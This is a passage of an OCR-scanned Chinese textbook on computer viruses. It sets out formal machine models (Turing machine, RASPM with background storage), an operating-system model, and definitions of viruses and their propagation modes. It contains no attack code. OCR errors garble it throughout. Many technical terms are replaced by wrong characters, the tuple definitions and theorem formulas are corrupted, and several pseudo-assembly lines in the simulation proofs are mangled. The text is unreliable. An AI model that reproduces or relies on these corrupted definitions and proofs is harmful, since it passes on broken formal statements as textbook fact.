每 个 单元 装 有 有 穷 符 号 集中 的 一 个 符号 。 初 始 状态 时 ,对 某 个 有 穷 的 2 人 0, 最 左 的 半 个 单 
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元 作为 输入 , 它 其实 是 一 个 符号 串 ,而 且 是 符号 集 的 子 集 。 剩 下 的 无 穷 多 个 单元 内 装 有 空白 
符号 , 它 是 一 个 不 属于 输入 符号 集 内 的 特殊 带 符号 。 下 面 给 出 图 灵机 的 定义 。 

定义 2.1 图 灵机 (TM) 可 以 用 一 个 七 元 组 来 表示 。 

TM = (Q,3, 了 ,9,gqo ,了 BF) 

其 中 ,Q 为 状态 的 有 限 集合 ; 械 为 市 符号 的 有 限 集 合 ; B 表示 空 日 符号 , 且 BET; 3 为 输入 
符号 集合 ,SS 有 上 且 BKB3; 6 为 转换 图 数 , 它 是 从 QXT 到 QXTX{L,R,N}) 的 映射 。 其 中 
L,R,NK (QUT) ,它们 分 别 表示 左 移 \、 右 移 和 不 动 ,但 对 于 某 些 (g,y) EQXT,6 可 以 无 意 
义 , 记 作 6(g,y) 二 86; qo 表示 初始 状态 , 且 go。 EQ; 下 表示 终止 状态 集合 , 且 FSQ。 

一 开始 TM 的 实际 状态 为 we 。 可 以 通过 依赖 于 前 一 状态 和 转换 函数 来 改变 实际 状态 。 
图 灵机 的 一 次 动作 ,取决 于 带头 扫描 的 符号 和 有 限 控 制 器 的 状态 。 一 次 动作 的 效应 表现 如 下 。 

(1) 优先 控制 器 改变 状态 。 

(2) 在 刚刚 扫描 过 的 单元 上 写 一 个 符号 (如 果 人 允许 的 话 ,可 以 使 用 空白 符号 ) ,用 以 替代 
原先 的 那个 符号 。 

(3) 带头 回 右 或 回 左 移动 一 个 单元 ,或 原 地 不 动 。 

图 灵机 (TMD) 可 以 由 多 个 带 组 成 ,但 计算 能 力 和 原始 的 单 带 图 灵机 是 多 向 式 关 系 。 曾 
经 有 文献 证 明 , 可 以 用 单 市 TM 来 仿真 多 市 TM。 

定理 2.3 如 果 指 令 的 代价 是 一 致 的 或 者 对 数 的 ,那么 TM 的 计算 能 力 和 RASPM 的 
计算 能 力 是 相等 的 ,并 且 它 们 的 时 间 耗 费 在 多 项 式 级 别 上 也 具有 可 比 性 。 

虽然 TM 在 计算 机 科学 领域 是 一 个 通用 的 工具 ,但 它 并 不 是 万 能 的 。 在 很 多 问题 上 是 
不 可 能 通过 TM 得 到 答案 的 。 让 我 们 来 考虑 Church 定理 (一 个 系统 是 可 判定 的 , 即 当 给 定 
了 这 个 系统 中 的 任 一 命题 时 ,可 以 找到 一 个 机 械 的 方法 来 判别 它 是 否 为 这 个 系统 中 的 一 条 
定理 ,否则 称 作 是 不 可 判定 的 。Church 定理 揭示 了 这 样 一 个 事实 , 即 在 有 的 公理 系统 中 不 
可 能 用 机 械 的 方法 来 判别 一 个 命题 是 否 为 一 条 定理 ,因为 在 这 些 系 统 中 ,证 明定 理 的 过 程 不 
可 能 是 机 械 的 , 它 只 能 是 一 种 创造 性 的 劳动 ) ,如 果 存 在 某 个 解决 问题 的 算法 ,那么 该 问题 也 
能 通过 TM 来 解决 。TM 的 停机 问题 就 是 一 个 著名 的 不 可 解 问题 。 

定理 2.4 不 可 能 构建 一 个 TM, 使 用 特殊 输入 来 决定 该 TM 是 否 停机 。 


2.2.4 市 后 台 存 储 的 RASPM 模型 


上 面 所 介绍 的 经 典 模型 仅 限 于 分 析 单 个 算法 或 程序 。 但 是 ,就 两 个 以 上 的 算法 或 程序 
间 的 联系 而 言 ,是 不 可 能 仅仅 通过 努力 就 能 实现 的 。 为 了 实现 程序 间 的 联系 ,必须 有 一 个 特 
殊 的 带 ,这 样 程序 及 程序 数据 就 能 存储 在 该 市 中 , 称 该 市 为 后 台 存 储 硕 。 进 一 步 假设 所 有 的 
正在 运行 的 程序 都 能 访问 . 读 或 修改 该 带 。 

定义 2.2 包含 后 台 存 储 需 的 随机 访问 存储 程序 计算 机 G(RASPM_ABS) 可 以 用 一 个 
六 元 组 来 定义 。 

G = (V,U,T,f,g,M) 

其 中 ,V 为 含有 输入 字符 、 输 出 字符 及 在 后 台 存 储 需 上 符号 的 非 空 集合 ,此 外 ,也 是 存储 在 存 
储 器 单元 中 的 信息 的 集合 ,统称 为 带 字 母 表 ; U 为 操作 码 的 非 空子 集 ,USCV; T 为 处 理 器 可 
能 行为 的 非 空 集合 ; f 为 唯一 的 函数 ,使 F: U 一 TT 为 真 的 函数 ; g 表示 指令 指针 的 初始 值 ; 
M 表示 存储 器 的 初始 内 容 。 
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假设 从 带 符号 集 V 到 整数 集 间 的 唯一 、 一 对 一 的 映射 是 有 效 的 (通过 此 方法 ,在 输入 
带 、 输 出 带 以 及 RASPM_ABS 或 RAM 的 存储 需 包 含 的 信息 间 就 有 了 一 对 一 的 通信 )。 

如 图 2-4 所 示 ,RASPM_ABS 有 一 个 输入 市 、 一 个 输出 带 及 一 个 后 台 存 储 融 ,它们 都 具 
有 无 限 的 长 度 。 输 入 带 只 能 被 用 来 读 取 信息 ,输出 带 只 能 用 来 写 信息 ,而 后 台 存 储 器 既 可 以 
读 又 可 以 写 。 当 读 或 写 信息 时 ,相应 的 带头 会 回 右 移 一 步 。 在 后 台 存 储 情况 下 ,有 可 能 发 生 
读 / 写 头 的 直接 移动 。 这 样 ,就 能 将 带 符 号 集 定 义 成 相同 的 整数 集合 。 


程序 (能 
储 在 存储 
项 中 ) 


输出 带 
图 2-4 包含 后 台 存 储 器 的 随机 访问 存储 程序 计算 机 (RASPM_ABS) 模 型 


男 外 ,计算 机 也 具有 一 个 无 限 长 的 存储 器 。 和 带 有 所 不 同 的 是 ,该 存储 器 可 以 直接 被 寻 
址 (也 就 是 可 以 直接 被 读 或 写 )。 存 储 器 的 第 一 个 单元 具有 特殊 的 性 质 , 和 RAM 一样 被 称 
为 累加 颖 。 

在 RASPM_ABS 内 部 , 带 和 存储 器 的 操作 是 由 处 理 需 来 执行 的 。 来 分 析 有 限 集合 UCV， 
函数 f 是 从 工 到 UU 的 每 一 个 元 素 的 单一 行为 的 映射 。 行为 f(z)( 这 里 操作 码 zxEU) 表 示 指 
令 。 在 RASPM_ABS 中 ,操作 码 ( 或 指令 ) 存 在 于 由 指令 指针 所 决定 的 地 址 中 ,并 由 处 理 咒 
执行 ,同时 也 随 之 设 定 指令 指针 的 新 值 。 操 作 码 处 于 单个 存储 器 单元 中 ,其 参数 则 处 于 下 一 
个 单元 中 。 因 此 ,RASPM_ABS 的 指令 指针 存储 在 两 个 单元 中 : 第 一 个 单元 包含 操作 码 ， 
第 二 个 单元 包含 有 关 的 参数 。 处 理 器 代码 和 指令 集 如 表 2-2 所 示 。 

表 2-2 包含 后 台 存 储 器 的 随机 访问 存储 程序 计算 机 (RASPM_ABS) 的 指令 集 


LOAD 将 操作 数 指定 的 值 装 入 累加 器 

STORE 将 存储 在 累加 器 中 的 值 复制 到 操作 数 指定 的 单元 中 

ADD 将 操作 数 指定 的 值 加 到 累加 器 中 

SUB ”| 操作 数 | 40 | 从 累加 器 中 减 去 操作 数 指定 的 值 

MULT 用 操作 数 指定 的 值 与 累加 器 中 的 值 相 乘 

DIV ”| 操作 数 | ”60 | 用 操作 数 指定 的 值 除 以 累加 器 中 的 值 

AND 使 累加 器 中 的 值 和 操作 数 指定 的 值 执行 按 位 “与 ”的 操作 
OR ”操作 数 | ”80 | 使 累加 器 中 的 值 和 操作 数 指定 的 值 执行 按 位 “或 "的 操作 
XOR 使 累加 器 中 的 值 和 操作 数 指定 的 值 执行 按 位 “ 异 或 ”的 操作 


32 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


续 表 


READ 将 输入 带 上 的 值 装 入 操作 数 指定 的 单元 中 

WRITE | 操作 数 | ”Bo | 将 操作 数 指定 的 值 写 到 输出 带 上 

GET 将 后 台 存 储 器 上 的 值 装 入 操作 数 指定 的 单元 中 

PUT | 操作 数 | ”Do | 将 操作 数 指定 的 值 写 到 后 台 存 储 器 上 

SEEK | 操作 数 | ”FE0 | 将 后 台 存储 器 的 读 写 头 移动 到 操作 数 指定 的 位 置 上 

JUMP HE 修改 指令 指针 使 其 指向 标号 所 指定 的 值 

JGTZ | 标号 | FD | 如 果 累 加 器 中 的 值 为 正 , 那 么 修改 指令 指针 指向 标号 所 指定 的 值 
JZERO | 标号 | FE | 如 果 累 加 器 中 的 值 为 零 , 那 么 修改 指令 指针 指向 标号 所 指定 的 值 


ool 


用 CO) 表示 存储 硕 中 第 i(i 是 整数 ) 个 单元 的 内 容 , 并 允许 使 用 表 2-3 所 示 的 操作 数 。 


表 2-3 操作 数 类 型 
操 作 数 操作 数 代码 含 义 
[2] 0 CG) 
[[] 3 CCG)) 


因为 在 RASPM 中 程序 可 以 修改 自身 ,所 以 使 用 [[z] 类 型 操作 数 的 指令 可 以 用 其 他 的 
指令 代替 ,而 且 某 些 操作 也 可 以 用 其 他 操作 来 代替 。 

当然 ,并 不 是 所 有 可 能 的 操作 数 都 能 被 分 派 给 每 一 个 操作 。 如 果 某 个 指令 的 目的 单元 
格 已 经 被 某 个 操作 指定 ,那么 操作 数 允 许 的 类 型 则 为 [i 和 [Li]]。 例 如 ,READ 操作 仅 有 
[i 或 [[i]] 型 的 操作 数 。 

RASPM_ABS 的 指令 集 和 每 个 操作 的 代码 也 都 包含 在 表 2-2 中 。 用 两 位 阿拉 伯 数 字 
来 定义 操作 的 十 六 进 制 代码 。 第 一 位 数字 和 操作 有 关 ,第 二 位 数字 则 与 操作 数 的 类 型 有 关 。 
这 就 意味 着 如 果 指 令 参 数 是 一 个 操作 数 ,那么 指令 代码 就 可 以 通过 将 操作 代码 和 操作 数 相 
加 而 计算 出 来 。 

当 指令 指针 回 存 储 器 寻 址 时 ,如果 存储 器 单元 的 内 容 zxEV 且 z 代 U, 也 就 是 说 , 它 既 不 
是 操作 码 ,也 没有 分 配 任 何 指令 给 它 ,那么 计算 机 将 停止 运行 。 

当 打 开 计 算 机 时 ,指令 指针 会 获得 初始 值 g, 并 且 处 理 希 会 立即 执行 通过 g 值 寻 址 到 的 

令 。 待 执行 的 程序 和 算法 将 由 存储 器 中 的 指令 决定 ,所 以 它 必须 由 存储 器 的 初始 内 容 

(MD 来 决定 。 计 算 机 在 下 述 情况 下 停机 。 

d 关机 。 

@ 得 到 指令 指针 所 决定 单元 的 值 , 且 该 值 不 属于 指令 代码 。 

G) 除数 为 零 。 

所 以 ,与 RAM 相 比 ,RASPM_ABS 没有 ”停机 ?命令 。 此 外 ,对 于 除数 为 零 的 情况 而 
言 , 当 没有 执行 任何 操作 时 ,是 可 能 创建 一 个 无 限 循环 的 。 

在 每 次 开机 时 ,存储 器 的 内 容 都 是 TM 的 初始 值 , 它 在 关机 时 被 删除 。 不 同 的 是 ,后 
存储 器 在 关机 时 仍 能 保留 其 内 容 , 可 以 借用 原始 的 ,包含 后 台 存 储 器 的 随机 访问 存储 程序 计 
算 机 来 定义 包含 多 个 后 台 存 储 需 的 随机 访问 存储 程序 计算 机 (Random Access Stored 
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Program Machine with Several Attached Background Storage, RASPM_SABS)。 在 此 , 需 
要 定义 一 个 新 的 指令 。 

定义 2.3 借助 于 RASPM_ABS, 可 以 通过 如 下 的 扩展 来 定义 RASPM_SABS。 

RASPM_SABS 可 以 同时 附 到 更 多 的 后 台 存 储 硕 上 。 

所 有 后 台 存 储 器 的 全 部 符号 都 在 V 中 。 

处 理 器 可 能 的 动作 由 某 个 动作 行为 扩展 而 来 。 实 际 的 后 台 存 储 器 可 以 由 这 个 新 指令 
选择 。 

该 指令 执行 后 ,每 个 和 后 台 存 储 器 有 关 的 操作 都 在 实际 的 后 台 存 储 器 上 被 执行 。 

如 果 执 行 与 后 台 存 储 器 相关 的 指令 , 且 先 前 没有 给 定 SETDRIVE 指令 ,那么 该 指令 将 
使 用 第 一 个 后 台 存 储 器 。 

当 RASPM_ABS 停机 时 ,如 果 将 要 执行 和 某 个 无 效 的 后 台 存 储 需 相关 的 SETDRIVE 
指令 ,计算 机 将 随 之 停机 。 

定理 2.5 因为 RASPM SABS 和 RASPM _ABS 相似 ,所 以 它们 可 以 相互 模拟 。 

证 明 : 由 于 证 明 RASPM_ABS 能 够 由 RASPM_SABS 来 模拟 并 没有 太 大 价值 ,所 以 只 
要 证 明 RASPM_SABS 可 以 由 RASPM_ABS 模拟 就 行 了 。 通 过 以 下 的 方法 将 原始 的 、 待 模 
拟 计 算 机 (RASPM_SABS) 的 N 个 融 上 映射 到 进行 模拟 的 计算 机 (RASPM_ABS) 的 单个 市 
上 。 将 待 模拟 的 计算 机 的 带 按 0 一 N 一 1 的 顺序 进行 编号 ,并 把 第 i 个 带 的 第 7 个 符号 转移 
到 新 带 的 第 NT 二 7 一 :个 位 置 。 按 如 下 方法 来 修改 进行 模拟 的 计算 机 存储 需 。 

Qa 单元 0 是 累加 器 。 

多 保留 单元 1。 

@) 单元 2 包含 单元 3 到 单元 N 十 2 的 地 址 ,而 单元 3 到 单元 N 十 2 则 包含 了 后 台 存 储 
器 读 写 头 的 位 置 。 

4 单元 :03 过 ;过 N 十 2) 包 含 了 第 i 一 3 个 实际 后 台 存 储 需 的 读 写 头 位 置 。 

@) 如 果 该 内 容 没 有 向 后 面 所 述 那 样 被 修改 过 或 被 转移 ,那么 单元 i(N 十 2 二 让 包含 了 
待 模 拟 计算 机 的 单元 i 一 (N 十 2) 的 内 容 。 

待 模拟 计算 机 的 指令 必须 被 复制 到 正在 进行 模拟 的 计算 机 的 存储 器 中 ,并 且 需 完成 如 
下 修改 。 

Q@ 如 果 原 始 程 序 要 修改 实际 的 后 台 存 储 器 ,那么 新 带 的 次 序 就 进入 单元 2。 对 于 这 种 
情况 , 则 需要 用 如 下 的 指令 来 代 蔡 原始 指令 SETDRIVE a。 


STORE [1] ;保存 计数 器 

LOAD a ;装载 操作 数 

ADD 3 ;计算 真实 地 址 

STORE [2] ;保存 为 真实 的 磁带 号 
LOAD [1] ;恢复 计数 器 


@ 如 果 原 始 程序 要 读 或 写实 际 的 后 台 存 储 需 ,那么 单个 后 台 存 储 需 的 头 就 会 移动 到 实 
际 的 位 置 。 现 在 可 以 执行 所 要 求 的 操作 ,并 可 以 修改 实际 的 后 台 存 储 器 的 位 置 。 对 写 操作 
(PUT a) 而 言 ,适当 的 指令 如 下 。 


STORE [a ;保存 计数 器 
SEEK [[2]] ;移动 磁带 头 
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PUT a ;把 操作 数 写 到 磁带 
LOAD [[2]] ;转载 实际 的 磁带 头 
ADD N ;改变 位 置 

STORE [[2]] ;保存 新 位 置 

LOAD [1] ;恢复 计数 器 


G@) 如 果 原 始 程 序 要 修改 后 台 存 储 器 读 写 头 的 位 置 (SEEK a) ,那么 进行 模拟 的 程序 则 
Peat 


STORE [1] ;保存 计数 器 

LOAD a ;转载 操作 数 

MULT N ;第 3 一 5 行 : 计算 磁带 的 实际 位 置 
RDD [2] 

SUB 3 

STORE W210 ;保存 新 位 置 

LOAD [1] ;恢复 计数 器 


@ 在 原始 程序 进行 复制 的 过 程 中 ,必须 根据 进行 模拟 计算 机 的 程序 中 的 移动 将 存储 右 
单元 的 标号 进行 解释 。 

这 样 , 就 可 以 通过 其 他 指令 来 取代 某 些 指令 从 而 达到 利用 RASPM_ABS 来 模拟 
RASPM_SABS 的 目的 。 在 对 每 个 指令 ( 竺 模拟 的 ) 进 行 模拟 时 所 用 到 的 指令 均 不 多 于 7 
个 。 因 此 ,在 代价 标准 相同 的 基础 上 ,如 果 待 模拟 程序 的 时 间 复 杂 度 为 T(z) ,那么 进行 模拟 
程序 的 时 间 复 杂 度 则 不 会 超过 7T(n) ,这 独立 于 输入 。 如 果 考 虑 对 数 级 的 代价 标准 ,那么 情 
况 就 会 变 得 更 加 复杂 。 在 这 种 情况 下 ,指令 STORE[L1] 和 LOAD[L1] 的 代价 是 累加 器 初始 
内 容 的 图 数 。 然 而 ,很 明显 累加 需 的 内 容 必 须 通 过 原始 程序 产生 ,而 且 与 累加 需 尺 寸 的 困 数 
相似 ,该 产生 也 具有 对 数 级 的 代价 。 这 就 意味 着 即使 在 最 坏 的 情况 下 ,指令 STOREL1j 和 
LOADL1j 也 可 以 仅 通过 和 某 个 常量 相 乘 来 增加 原始 程序 的 对 数 级 代价 。 上 面 用 来 模拟 指 
令 的 程序 中 包含 了 这 样 一 些 指 令 : 执行 带 有 原始 指令 操作 数 的 操作 或 带 有 用 常量 相 梯 后 的 
值 的 操作 (这 里 假设 带 的 个 数 N 为 一 个 常量 )。 因 此 ,原始 程序 的 对 数 级 的 花费 (nn) 仅 被 
提高 到 cT(n)。 

所 以 RASPM_ABS 的 计算 能 力 不 能 通过 使 用 更 多 的 后 台 存 储 需 来 提高 。 了 解 这 些 事 
实 后 ,知道 RASPM_ABS 的 计算 能 力 是 不 可 能 超过 RASPM 的 计算 能 力 的 。 

定理 2.6 任意 RASPM_ABS 都 可 以 用 一 个 RASPM 来 模拟 ,并 且 进 行 模拟 程序 的 代 
价 函 数 等 于 待 模拟 程序 的 代价 函数 的 常数 倍 。 

证 明 : 和 定理 2. 5 相似 ,现在 开始 将 存储 器 和 后 台 存 储 器 的 内 容 搜寻 到 新 的 存储 器 中 。 
随 之 就 能 得 到 一 个 RASPM, 也 就 是 一 个 没有 后 台 存储 器 的 计算 机 搜寻 过 程 中 主要 的 区 
别 就 是 原始 存储 右 必 须 被 分 成 块 ,因为 搜寻 不 能 分 割 同 属于 一 个 指令 的 单元 。 当 然 , 一 个 新 
的 JUMP 指令 必须 附加 到 每 个 块 的 末尾 。 通 过 这 样 的 方法 ,原始 程序 代码 能 够 被 转移 到 新 
的 存储 器 中 ,而 且 后 台 存 储 器 的 内 容 能 够 被 插入 程序 块 间 。 在 原始 程序 的 转移 过 程 中 ,必须 
根据 进行 模拟 计算 机 的 程序 中 的 移动 将 存储 器 单元 的 标号 进行 解释 。 搜 寻 过 程 中 的 男 一 个 
区 别 就 是 现在 不 需要 利用 单元 来 得 到 实际 的 后 台 存 储 器 的 顺序 (因为 RASPM_ABS 只 包含 
一 个 后 台 存 储 融 ) ,而 且 那 个 仅 有 的 单元 被 要 求 包含 唯一 的 读 写 头 的 位 置 。 
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定理 2.6 的 一 个 结论 如 下 。 

定理 2.7 TM 的 计算 能 力 和 RASPM_ABS 的 计算 能 力 相 当 , 并 且 它 们 的 花费 在 多 项 
式 水 平 上 是 可 比 的 。 

证 明 : 由 于 任 一 RASPM_ABS 都 可 以 用 一 个 RASPM 来 模拟 (定理 2.6), 因 此 反 过 来 
也 成 立 ( 没 有 多 大 价值 ) ,而 且 任 一 RASPM 都 能 用 图 灵机 来 模拟 , 反 过 来 也 同样 成 立 ( 定 理 
2.3), 所 以 RASPM_ABS 也 可 以 用 图 灵机 来 模拟 , 反 过 来 也 成 立 。 代 价 标 准 从 定理 2. 3 及 
定理 2.6 中 的 陈述 得 出 。 

RASPM_ABS 的 后 台 存 储 融 既 可 以 被 看 成 是 输入 融 , 又 可 以 被 看 成 是 输出 市 ,因为 假 
设 当 计算 机 启动 时 后 人 台 存 储 器 上 已 有 用 来 输入 的 数据 ,并 且 假 设 在 计算 机 关闭 后 存储 器 也 
能 保留 数据 。 由 于 输入 融 也 包含 了 后 台 存 储 颖 的 内 容 , 因 此 在 RASPM 中 后 台 存 储 器 的 角 
色 也 可 以 用 输入 市 来 代替 。 它 可 以 通过 将 偶数 市 单元 指派 给 原始 输入 市 单元 ,将 奇数 市 单 
元 指派 给 后 台 存 储 器 单元 来 完成 。 开 机 时 ,RASPM 将 后 台 存 储 器 最 初 的 数据 从 输入 带 复 
制 到 程序 块 间 已 有 的 空闲 存储 需 单 元 中 (存储 需 分 配 在 定理 2.6 的 证 明 中 已 介绍 过 )。 该 复 
制 的 执行 使 得 复制 程序 只 将 数据 存放 到 程序 块 间 的 偶数 单元 中 (奇数 单元 的 单元 将 被 作为 
临时 的 输出 带 )。 当 程序 运行 时 ,并 且 输 入 或 涉及 指令 的 后 台 带 被 执行 ,数据 还 没有 进入 时 ， 
计算 机 读 取 并 有 自动 恢复 输入 融 中 适当 数量 的 单元 ,直到 达到 指定 的 数据 。 当 程序 试图 写 和 人 
实际 的 后 台 存 储 单元 写 和 人 存储 器 的 适当 位 置 。 当 然 , 如 果 提 及 的 单元 还 没有 被 读 , 那 么 它 必 
须 先 读 。 当 程序 试图 在 输出 涡 上 写 时 ,那么 它 将 回程 序 块 间 的 下 一 个 空 闪 的 技术 单元 写 。 
在 RASPM 停机 之 前 , 它 将 后 台 存 储 副 以 及 实际 园 出 市 的 内 容 放 到 真实 的 输出 市 。 在 这 一 
点 上 ,RASPM 也 能 被 看 作 狐 备 了 后 台 存 储 冀 的 计算 机 。 


2.2.5 操作 系统 模型 


对 于 程序 的 执行 ,应 该 使 用 RASPM_ABS 和 RASPM _SABS,。 G=<V,U,T,f,g,M > 
中 的 元 素 V.U、T 和 了 已 经 在 定义 2.2 和 定义 2.3 中 说 明 。 现 在 ,如 果 能 对 g 和 M 作出 详 
细 说 明 ,那么 就 可 以 给 出 对 计算 机 操作 进行 说 明 的 程序 。 后 台 存 储 器 中 包含 程序 和 数据 文 
件 。 通 过 输入 带 可 以 决定 程序 运行 的 顺序 。 一 个 正在 运行 的 程序 可 以 读 、 写 或 修改 包含 现 
有 程序 和 数据 文件 的 后 人 台 存 储 器 。 因 此 ,需要 一 个 能 处 理 程序 和 数据 文件 ,并 能 使 指定 的 程 
序 代码 运行 的 框架 程序 。 

定义 2.4 操作 系统 被 定义 成 如 下 的 程序 系统 ,该 程序 系统 能 够 处 理 分 离 的 程序 或 数 
据 文件 ,并 能 使 指定 的 程序 代码 运行 。 给 定 RASPM_ABS 操作 系统 的 定义 ,就 能 发 现 
RASPM_ABS 和 实际 计算 机 系统 间 的 相似 性 , 即 它们 都 有 一 个 后 台 存 储 器 ,用 户 可 以 将 分 
离 的 数据 和 程序 存储 在 该 存储 器 中 ,而 且 , 它 们 都 包含 能 够 处 理 这 些 文件 的 操作 系统 。 

操作 系统 既 可 以 被 包含 在 存储 器 的 初始 值 M 中 ,也 可 以 被 放置 在 后 台 存 储 器 中 。 对 于 
后 一 种 情况 ,存储 器 的 初始 值 M 包含 一 个 特殊 程序 ,该 程序 从 g 指定 的 地 方 开 始 运 行 (g 的 
功能 是 从 后 台 存 储 器 装载 操作 系统 并 使 其 运行 )。 在 此 情况 下 ,一般 不 会 将 加 载 的 程序 看 成 
操作 系统 的 一 部 分 。 

定义 2.5 如 果 操 作 系 统 被 包含 在 存储 器 的 初始 值 M 中 ,那么 该 操作 系统 被 称 为 专用 
计算 机 的 操作 系统 。 

这 就 意味 着 通过 对 RASPM_ABS 的 详细 说 明 ,操作 系统 也 随 之 被 定义 了 。 
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定义 2.6 如 果 操 作 系 统 被 包含 在 后 台 存 储 副 中 ,那么 该 操作 系统 被 称 为 独立 于 计算 
机 的 操作 系统 。 

因此 ,可 以 通过 改变 后 台 存 储 需 来 改变 RASPM_ABS 的 操作 系统 。 

通过 其 他 途径 ,计算 机 能 够 称 为 专用 操作 系统 的 或 独立 于 操作 系统 的 计算 机 。 

定义 2.7 如 果 在 RASPM_ABS 中 ,存储 器 的 初始 值 M 包含 了 操作 系统 ,那么 该 计算 
机 就 被 称 为 专用 操作 系统 的 计算 机 。 

在 此 情况 下 ,计算 机 只 能 使 用 它 目 己 的 操作 系统 (当然 ,可 以 编制 一 个 能 够 模拟 其 他 操 
作 系 统 的 程序 ) 。 

定义 2.8 如 果 RASPM_ABS 的 操作 系统 被 包含 在 后 台 存 储 需 中 ,那么 就 称 RASPM_ 
ABS 为 独立 于 操作 系统 的 计算 机 。 

当然 , 既 可 以 改变 后 台 存 储 器 ,也 可 以 改变 操作 系统 。 

下 面 的 定理 是 定义 2.4 一 2. 8 的 直接 结论 。 

定理 2.8 如 果 用 O 表 示 RASPM_ABS( 用 GG 表示) 的 专用 操作 系统 ,那么 G 则 表示 专 
用 操作 系统 的 计算 机 。 

证 明 : 该 定理 没有 太 大 的 价值 ,因为 如 果 O 是 计算 机 G 的 专用 操作 系统 ,那么 G 的 存 
储 希 则 包含 操作 系统 OO。 这 就 意味 着 G 是 专用 操作 系统 的 计算 机 。 

定理 2.9 如 果 O 是 独立 于 RASPM_ABS 的 操作 系统 ,那么 G 是 独立 于 操作 系统 的 计 
算 机 。 

证 明 : 该 定理 也 没有 太 大 的 价值 ,因为 如 果 O 是 独立 于 计算 机 G 的 操作 系统 ,那么 O 
包含 在 后 台 存 储 希 中 ,而 不 是 包含 在 存储 需 中 。 这 就 意味 着 G 是 独立 于 操作 系统 的 计 
算 机 。 

根据 所 概括 的 一 般 要 求 以 及 ISO 标准 ,操作 系统 是 管理 程序 执行 的 程序 系统 : 调度 执 
行 、 共 享 资 源 以 及 建立 唯一 程序 间 的 链接 。 

根据 定义 2.4, 为 了 检查 唯一 程序 间 的 链接 ,可 以 定义 RASPM_ABS 的 操作 系统 。 不 
管 RASPM_ABS 的 操作 系统 是 不 是 专用 的 ,都 可 以 通过 使 用 RASPM_ABS 来 定义 符合 上 
面 所 提 到 的 要 求 的 操作 系统 。 但 是 ,如 果 要 检查 用 来 修改 操作 系统 代码 的 程序 名 ,那么 必须 
使 用 独立 于 操作 系统 的 计算 机 。 否 则 ,它们 就 不 能 对 操作 系统 进行 真正 的 修改 ,因为 计算 机 
的 重新 启动 总 是 会 破坏 临时 的 修改 。 


2.2.6 基于 RASPM_ABS 的 病毒 


在 定义 2.4 中 ,给 出 了 操作 系统 的 定义 , 即 能 够 处 理 并 使 其 运行 的 程序 。 所 以 现在 也 可 
以 给 出 RASPM_ABS 中 病毒 的 定义 。 

定义 2.9 计算 机 病毒 被 定义 成 程序 的 一 部 分 ,该 程序 附着 在 某 个 程序 上 并 能 将 自身 
链接 到 其 他 程序 上 。 当 病毒 所 附着 的 程序 被 执行 时 ,计算 机 病毒 的 代码 也 跟着 被 执行 。 

病毒 不 必 执 行程 序 的 原始 功能 ,但 它们 却 经 常 这 样 做 ,因为 它们 不 想 被 发 觉 。 所 以 , 病 
毒 必须 修改 原 程序 。 在 相反 的 情况 下 ,病毒 可 能 会 重 写 程序 ,这 样 也 就 破坏 了 程序 。 

1. 病毒 的 传播 模型 

正如 现实 中 人 们 所 知道 的 那样 ,病毒 可 以 附着 到 不 同 的 程序 上 ,将 病毒 附 看 到 不 同 程序 
上 的 形式 称 为 其 传播 方式 。 病 毒 可 以 有 不 同 的 传播 方式 。 
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定义 2.10 如 果 病 毒 利用 了 计算 机 的 一 些 典 型 特征 或 服务 进行 传播 ,那么 这 种 传播 方 
式 被 称 为 专用 计算 机 的 传播 方式 。 如 果 病 毒 在 传播 时 没有 利用 计算 机 的 服务 进行 传播 , 那 
么 此 传播 方式 被 称 为 独立 于 计算 机 的 传播 方式 。 

当 能 够 被 病毒 感染 的 程序 依赖 于 计算 机 时 ,病毒 的 传播 方式 可 能 是 专用 计算 机 的 传播 
方式 。 例 如 ,在 IBM PC 中 ,引导 型 病毒 具有 专用 计算 机 的 传播 方式 ,因为 引导 悄 区 的 划分 
依赖 于 IBM PC 的 结构 。 为 了 进行 传播 ,IBM PC 中 任何 类 型 的 引导 型 病毒 都 必须 利用 
BIOS 或 磁盘 控制 希 的 服务 。 

当 能 够 被 病毒 感染 的 程序 不 依赖 于 计算 机 时 , 则 病毒 的 传播 方式 可 能 是 独立 于 计算 机 
的 传播 方式 。 例 如 ,可 以 感染 C 源 文件 的 病毒 就 是 具有 独立 计算 机 的 传播 方式 ,因为 它们 
可 以 在 不 同 的 计算 机 上 通过 使 用 相同 的 传播 方式 对 C 源 文件 进行 感染 。 

也 可 以 从 操作 系统 角度 定义 病毒 传播 方式 的 依赖 性 。 

定义 2.11 如 果 病 毒 利用 操作 系统 的 某 些 典型 特征 或 服务 进行 传播 ,那么 这 种 传播 方 
式 被 称 为 专用 操作 系统 的 传播 方式 。 如 果 病 毒 在 传播 期 间 没 有 利用 操作 系统 的 服务 进行 传 
播 , 那 么 此 传播 方式 被 称 为 独立 于 操作 系统 的 传播 方式 。 

当 能 够 被 病毒 感染 的 程序 依赖 于 操作 系统 时 ,病毒 的 传播 方式 可 能 是 专用 操作 系统 的 
传播 方式 。 例 如 ,在 DOS 系统 下 ,感染 EXE 文件 的 病毒 就 是 DOS 系统 的 专 有 传播 方式 , 因 
为 ,EXE 文件 结构 具有 DOS 系统 的 特征 。 

当 能 够 被 病毒 感染 的 程序 不 依赖 于 操作 系统 时 ,病毒 的 传播 方式 可 能 是 独立 于 操作 系 
统 的 传播 方式 。 例 如 ,在 DOS 系统 下 ,引导 型 病毒 就 是 独立 于 DOS 的 传播 方式 ,因为 在 不 
使 用 DOS 服务 的 情况 下 , 它 也 可 以 对 引导 扇 区 (或 主 引 导 扇 区 ) 进 行 感染 。 

定义 2.12 当 病 毒 只 能 以 专用 计算 机 的 传播 方式 进行 传播 时 ,该 病毒 便 被 称 为 专用 计 
算 机 的 病毒 。 如 果 病 毒 的 所 有 传播 方式 都 独立 于 计算 机 , 则 称 该 病毒 为 独立 于 计算 机 的 
病毒 。 

定义 2.13 当 病 毒 只 能 以 专用 操作 系统 的 传播 方式 进行 传播 时 ,该 病毒 便 被 称 为 专用 
操作 系统 的 病毒 。 如 果 病 毒 的 所 有 传播 方式 都 独立 于 操作 系统 , 则 称 该 病毒 为 独立 于 操作 
系统 的 病毒 。 

很 明显 ,因为 病毒 必须 使 用 能 够 执行 可 执行 文件 的 解释 程序 的 指令 集 ,所 以 独立 于 计算 
机 的 病毒 不 能 感染 可 执行 文件 。 可 执行 文件 来 自 于 用 高 级 程序 语言 编写 的 源 文件 。 由 于 病 
毒 在 传播 期 间 ,能 够 修改 这 些 源 文件 ,因此 病毒 独立 于 执行 病毒 程序 的 处 理 副 。 当 然 ,用 来 
